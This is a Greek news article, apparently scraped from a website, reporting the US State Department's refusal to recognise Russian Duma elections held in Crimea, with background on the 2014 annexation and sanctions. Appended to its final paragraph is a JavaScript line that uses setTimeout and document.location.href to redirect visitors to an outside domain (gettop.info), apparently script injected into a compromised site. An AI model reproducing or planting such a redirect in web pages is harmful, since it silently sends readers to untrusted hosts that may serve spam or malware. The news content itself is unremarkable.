Οι ΗΠΑ δεν αναγνωρίζουν τις βουλευτικές εκλογές στην Κριμαία

0
6

 

Αύριο διενεργούνται ρωσικές βουλευτικές εκλογές στην Κριμαία και το Στέιτ Ντιπάρτμεντ ανακοίνωσε πως δεν πρόκειται να «αναγνωρίσουν τη νομιμότητά» τους.

«Οι Ηνωμένες Πολιτείες δεν αναγνωρίζουν τη νομιμότητα και δεν θα αναγνωρίσουν τα αποτελέσματα των εκλογών για τη ρωσική Δούμα που διεξάγονται στις 18 Σεπτεμβρίου στην Κριμαία, υπό ρωσική κατοχή«, ανέφερε ο εκπρόσωπος του Στέιτ Ντιπάρτμεντ.

«Η θέση μας για την Κριμαία είναι ξεκάθαρη: η χερσόνησος παραμένει αναπόσπαστο τμήμα της Ουκρανίας». Οι κυρώσεις που έχουν ληφθεί κατά της Ρωσίας θα παραμείνουν σε ισχύ μέχρις ότου η Ρωσία παραδώσει τον έλεγχο της Κριμαίας στην Ουκρανία» συμπλήρωσε.

Το Στέιτ Ντιπάρτμεντ εξέφρασε επίσης την ανησυχία του για την «ανθρωπιστική κατάσταση στην Κριμαία, περιλαμβανομένης και της κατάστασης της κοινότητας των Τατάρων» «και για τις πολλές αναφορές για εξαφανισμένους και για παραβιάσεις των ανθρωπίνων δικαιωμάτων«.

Η Κριμαία προσαρτήθηκε από τα ρωσικά στρατεύματα και εν συνεχεία επανασυνδέθηκε τον Μάρτιο του 2014 στη Ρωσία έπειτα από ένα δημοψήφισμα το οποίο χαρακτήρισαν παράνομο το Κίεβο και οι Δυτικοί. Μετά την προσάρτηση ξέσπασε μια ένοπλη σύγκρουση στο αυτονομιστικό φιλορωσικό ανατολικό τμήμα της χώρας, προκαλώντας περισσότερους από 9.500 θανάτους σε διάστημα λίγο μεγαλύτερο των δύο ετών.

Σε αντίποινα για την προσάρτηση, οι ΗΠΑ και η Ευρώπη επέβαλαν σκληρές οικονομικές κυρώσεις στη Ρωσία και στην Κριμαία. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here